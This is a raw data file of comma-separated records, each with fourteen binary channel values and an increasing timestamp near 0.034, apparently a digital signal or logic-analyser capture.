1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3901780e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,3.3901784e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901788e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901804e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901828e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3901928e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3901952e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3901980e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3902004e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902036e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902076e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902084e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3902128e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902152e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3902180e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902204e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902212e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902228e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902300e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902328e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902352e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902356e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3902404e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902428e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902436e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902528e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902532e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3902580e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902604e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902612e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902628e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902652e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902728e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902752e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902780e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902804e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902828e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902852e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902876e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902900e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3902928e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3902952e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3902956e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3902980e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903004e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3903028e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903052e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3903076e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903108e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903156e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903180e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903204e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903228e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903232e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3903276e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903300e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3903328e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903352e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903360e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903380e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903404e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903428e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903452e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903500e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903508e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3903552e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3903580e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,3.3903584e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903588e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903604e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903628e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903728e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903752e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903780e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903804e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903828e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903928e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3903952e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3903980e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904004e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904028e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904128e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904132e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3904180e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904204e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904212e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904228e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904300e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904328e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904352e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904356e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3904380e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904404e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,3.3904408e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904412e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904528e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904552e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904580e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904604e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904628e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904652e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.3904656e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904660e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3904676e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904708e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904728e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904752e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904780e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,3.3904804e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904808e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3904852e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3904876e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904884e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904928e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3904952e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3904980e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905004e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905028e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905128e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905152e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905180e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905204e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905228e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905328e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905352e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905380e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905404e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905428e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905476e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3905484e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3905500e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3905528e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905532e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905580e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905604e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905728e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905752e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3905780e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3905804e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3905828e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905836e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905876e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3905884e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3905928e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3905952e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3905960e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3905980e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906004e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906148e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3906156e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,3.3906196e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906228e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906372e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906396e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906424e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906572e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906596e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906624e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906772e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906796e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906824e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906924e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3906948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3906972e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907000e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907024e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907172e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907200e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907224e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907372e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907400e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907424e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907572e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907600e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907624e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3907752e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3907772e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,3.3907780e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.4032332e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.4032572e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4032592e-02 0,1,0,0,1,1,0,0,0,1,0,1,0,1,3.4032612e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4032640e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,1,3.4032952e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4032980e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4032984e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4033004e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4033028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4033052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4033076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4033100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4033128e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4033152e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4033180e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4033204e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033328e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033352e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033380e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033404e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033428e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4033432e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4033476e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4033504e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033508e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033528e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033552e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033580e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033604e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033628e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,3.4033652e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4033656e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4033700e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4033724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033732e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4033948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4033976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034000e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4034028e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4034076e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4034100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034108e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034148e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034172e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034200e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034228e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034252e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034276e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034300e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4034304e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4034348e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4034376e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4034380e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034384e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034400e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034476e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4034480e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4034524e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4034548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034556e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034576e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034600e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034628e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034652e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034676e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034700e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034748e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034776e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034800e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034828e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034852e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034876e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034900e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034924e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4034948e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4034972e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035000e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035028e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4035052e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4035100e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4035124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035132e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035176e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4035180e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4035228e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4035252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035260e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035276e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035300e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035324e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035348e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035376e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035400e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035424e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4035452e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4035500e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4035524e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035532e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035600e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4035948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4035976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036000e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036024e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036076e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4036080e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4036124e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4036148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036156e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036176e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036200e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036228e-02 